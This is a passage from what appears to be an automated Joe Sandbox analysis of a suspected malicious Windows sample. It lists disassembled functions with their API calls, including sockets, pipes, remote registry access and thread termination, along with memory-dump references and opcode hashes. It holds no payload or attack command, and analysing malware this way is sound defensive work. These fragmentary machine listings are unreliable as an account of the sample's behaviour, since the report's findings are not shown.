                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: fbb6193e0d7b823dcaf49bec0f43ce950d1bdad4cfd6cbed66eba3eccb53dde4
                                      • Instruction ID: 5de8ca365efc91ddb0d39fef4beb0791c07b01f0ca50094aab425b77982a24cd
                                      • Opcode Fuzzy Hash: fbb6193e0d7b823dcaf49bec0f43ce950d1bdad4cfd6cbed66eba3eccb53dde4
                                      • Instruction Fuzzy Hash: 6931F839604160AFDB218F58EC84F753BE5FF6A710F1A0164F5148F2B2CBB1A845AF41
                                      Function 004F7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F7769
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F778F
                                      • SysAllocString.OLEAUT32(00000000), ref: 004F7792
                                      • SysAllocString.OLEAUT32(?), ref: 004F77B0
                                      • SysFreeString.OLEAUT32(?), ref: 004F77B9
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 004F77DE
                                      • SysAllocString.OLEAUT32(?), ref: 004F77EC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: e87a42c2a0d998f2d87d82cb76182b14084eee8f80a466672542940fd371d2d9
                                      • Instruction ID: 1e864e129313bd7d6fd2118faf1f32799d9971383f227934bf4c5202cffd475e
                                      • Opcode Fuzzy Hash: e87a42c2a0d998f2d87d82cb76182b14084eee8f80a466672542940fd371d2d9
                                      • Instruction Fuzzy Hash: 16219476604219AFDF10EFA9CC44CBB77ECEF193647108026FA04DB251D678AC4687A4
                                      Function 004F77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F7842
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F7868
                                      • SysAllocString.OLEAUT32(00000000), ref: 004F786B
                                      • SysAllocString.OLEAUT32 ref: 004F788C
                                      • SysFreeString.OLEAUT32 ref: 004F7895
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 004F78AF
                                      • SysAllocString.OLEAUT32(?), ref: 004F78BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 1b4d6107f8159fcb346f627d212c27757abd50dd7c659dab0dd6a11ae4d17e40
                                      • Instruction ID: dec90c3396d42e8259320582d58fa4b3ce96177cdb4e0e14887baf12c71f1e9b
                                      • Opcode Fuzzy Hash: 1b4d6107f8159fcb346f627d212c27757abd50dd7c659dab0dd6a11ae4d17e40
                                      • Instruction Fuzzy Hash: 35217931604108AFDF10AFA8DC89D7B77ECEF197607108126FA15CB2A1D678DC45DB68
                                      Function 005004D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 005004F2
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0050052E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateHandlePipe
                                      • String ID: nul
                                      • API String ID: 1424370930-2873401336
                                      • Opcode ID: dc7204d253e11213ee1fada8a3f77acb2ea236ae33b18f5fdfb2e801311ffaab
                                      • Instruction ID: b30eaef333a333746c43c4b4be450367f55dd5b590ae4b89d6b5388c8bec9b46
                                      • Opcode Fuzzy Hash: dc7204d253e11213ee1fada8a3f77acb2ea236ae33b18f5fdfb2e801311ffaab
                                      • Instruction Fuzzy Hash: 3A217A75500305ABDF208F29DC44BAE7FB4BF55724F204A29E8A1D62E0E7709945DF20
                                      Function 005005A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 005005C6
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00500601
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateHandlePipe
                                      • String ID: nul
                                      • API String ID: 1424370930-2873401336
                                      • Opcode ID: 34bc4c708003e989967865d586303d35bb7d8145e667a3446fff51fb7d2783f0
                                      • Instruction ID: 9211316cdc8ffa16e7fa150093632492d557c730f4da060281c8068bd3a92659
                                      • Opcode Fuzzy Hash: 34bc4c708003e989967865d586303d35bb7d8145e667a3446fff51fb7d2783f0
                                      • Instruction Fuzzy Hash: 43218E755003059BDB209F69DC04BAE7FE9BF95720F201A19F8A1E72E0DBB19961DB20
                                      Function 005240AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0049600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0049604C
                                        • Part of subcall function 0049600E: GetStockObject.GDI32(00000011), ref: 00496060
                                        • Part of subcall function 0049600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0049606A
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00524112
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0052411F
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0052412A
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00524139
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00524145
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: c5f7540d287b847dbc868cf4b3bfd6ed74c01549a09e49fe398b254f1bea3f54
                                      • Instruction ID: 4cd1e719be348e651181bc6d33c2c91e6e2c649bb682e7208148fc8a2caf9b9f
                                      • Opcode Fuzzy Hash: c5f7540d287b847dbc868cf4b3bfd6ed74c01549a09e49fe398b254f1bea3f54
                                      • Instruction Fuzzy Hash: 681193B11402297EEF118F64DC85EE77F5DFF19798F014111FA18A6090C6729C61DBA4
                                      Function 004CD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004CD7A3: _free.LIBCMT ref: 004CD7CC
                                      • _free.LIBCMT ref: 004CD82D
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      • _free.LIBCMT ref: 004CD838
                                      • _free.LIBCMT ref: 004CD843
                                      • _free.LIBCMT ref: 004CD897
                                      • _free.LIBCMT ref: 004CD8A2
                                      • _free.LIBCMT ref: 004CD8AD
                                      • _free.LIBCMT ref: 004CD8B8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                      • Instruction ID: 4d066e47518058557c2ef73a3f1c3f1beec7bf5a227613638fb17e4e5c8499c6
                                      • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                      • Instruction Fuzzy Hash: 5C1154B9941704AAD5A1BFB2CC47FCB7BDCAF00704F40083EB29DA6492D6BDB5054654
                                      Function 004FDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004FDA74
                                      • LoadStringW.USER32(00000000), ref: 004FDA7B
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004FDA91
                                      • LoadStringW.USER32(00000000), ref: 004FDA98
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004FDADC
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 004FDAB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 4072794657-3128320259
                                      • Opcode ID: 1a41cd24721ecbf9eba276e8ca8ec627b7b9607794d15bcdba627d0552268d92
                                      • Instruction ID: d01fc85357bce40a7cff27787d46c1f16c327f1c4ce6573b05c33f8dcf0391b4
                                      • Opcode Fuzzy Hash: 1a41cd24721ecbf9eba276e8ca8ec627b7b9607794d15bcdba627d0552268d92
                                      • Instruction Fuzzy Hash: 03018BF29002087FEB1097A49D89EFF3B6CEF05301F400496B705E2042E6749D898F74
                                      Function 0050096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(0117F0A0,0117F0A0), ref: 0050097B
                                      • EnterCriticalSection.KERNEL32(0117F080,00000000), ref: 0050098D
                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 0050099B
                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 005009A9
                                      • CloseHandle.KERNEL32(00000000), ref: 005009B8
                                      • InterlockedExchange.KERNEL32(0117F0A0,000001F6), ref: 005009C8
                                      • LeaveCriticalSection.KERNEL32(0117F080), ref: 005009CF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: 31ba6e3417a8199eb583fd0bba853fded33583458d62e4e9e2e48d2ecf8700ce
                                      • Instruction ID: 61fee15206d01c94a75e4f649128517a16eb4a54cd570a67bc71c74a7bbbf484
                                      • Opcode Fuzzy Hash: 31ba6e3417a8199eb583fd0bba853fded33583458d62e4e9e2e48d2ecf8700ce
                                      • Instruction Fuzzy Hash: EFF01D31442902EBD7615B94EE89BDE7E25BF12702F502415F101518A2CB74946ADF90
                                      Function 00511C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00511DC0
                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00511DE1
                                      • WSAGetLastError.WSOCK32 ref: 00511DF2
                                      • htons.WSOCK32(?,?,?,?,?), ref: 00511EDB
                                      • inet_ntoa.WSOCK32(?), ref: 00511E8C
                                        • Part of subcall function 004F39E8: _strlen.LIBCMT ref: 004F39F2
                                        • Part of subcall function 00513224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0050EC0C), ref: 00513240
                                      • _strlen.LIBCMT ref: 00511F35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                      • String ID:
                                      • API String ID: 3203458085-0
                                      • Opcode ID: 021d3461e04de8ebd7db232b930f232fdb5f8f11d07336e6d48bce5c587f30be
                                      • Instruction ID: 3aaf444ed426e5ef168957ff91ea89390fe4494a457cf2d1ac1b5ffebaa62234
                                      • Opcode Fuzzy Hash: 021d3461e04de8ebd7db232b930f232fdb5f8f11d07336e6d48bce5c587f30be
                                      • Instruction Fuzzy Hash: 80B10030204700AFD720EF25C885E6A7FA5BF85318F54899DF5564B2E2CB35ED82CBA5
                                      Function 004C01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                      Download Yara Rule
                                      APIs
                                      • __allrem.LIBCMT ref: 004C00BA
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C00D6
                                      • __allrem.LIBCMT ref: 004C00ED
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C010B
                                      • __allrem.LIBCMT ref: 004C0122
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C0140
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                      • Instruction ID: 05260aa2b943cafabc9c73334712cc8e173e64e9edc306536797cdc28cc92d33
                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                      • Instruction Fuzzy Hash: 7581F3796007069BE7609E6ACC42FABB3A8EF41728F24413FF455D7381EB79D9008798
                                      Function 004C61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004B82D9,004B82D9,?,?,?,004C644F,00000001,00000001,8BE85006), ref: 004C6258
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004C644F,00000001,00000001,8BE85006,?,?,?), ref: 004C62DE
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004C63D8
                                      • __freea.LIBCMT ref: 004C63E5
                                        • Part of subcall function 004C3820: RtlAllocateHeap.NTDLL(00000000,?,00561444,?,004AFDF5,?,?,0049A976,00000010,00561440,004913FC,?,004913C6,?,00491129), ref: 004C3852
                                      • __freea.LIBCMT ref: 004C63EE
                                      • __freea.LIBCMT ref: 004C6413
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: 5e048141163f6e6fc7539e25c89e5e266a30d913102fd6d8e008002229fe6890
                                      • Instruction ID: 3a69061f96bb5ec70d94a2ef1ac1b2e68612985de54ce5ccf2b4affe5b1b469b
                                      • Opcode Fuzzy Hash: 5e048141163f6e6fc7539e25c89e5e266a30d913102fd6d8e008002229fe6890
                                      • Instruction Fuzzy Hash: 47511376600202ABEB258F64CC81FBF7BA9EF44710F16822EFC05D6291DB38DC40C668
                                      Function 0051BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                        • Part of subcall function 0051C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0051B6AE,?,?), ref: 0051C9B5
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051C9F1
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051CA68
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051CA9E
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051BCCA
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0051BD25
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0051BD6A
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0051BD99
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0051BDF3
                                      • RegCloseKey.ADVAPI32(?), ref: 0051BDFF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
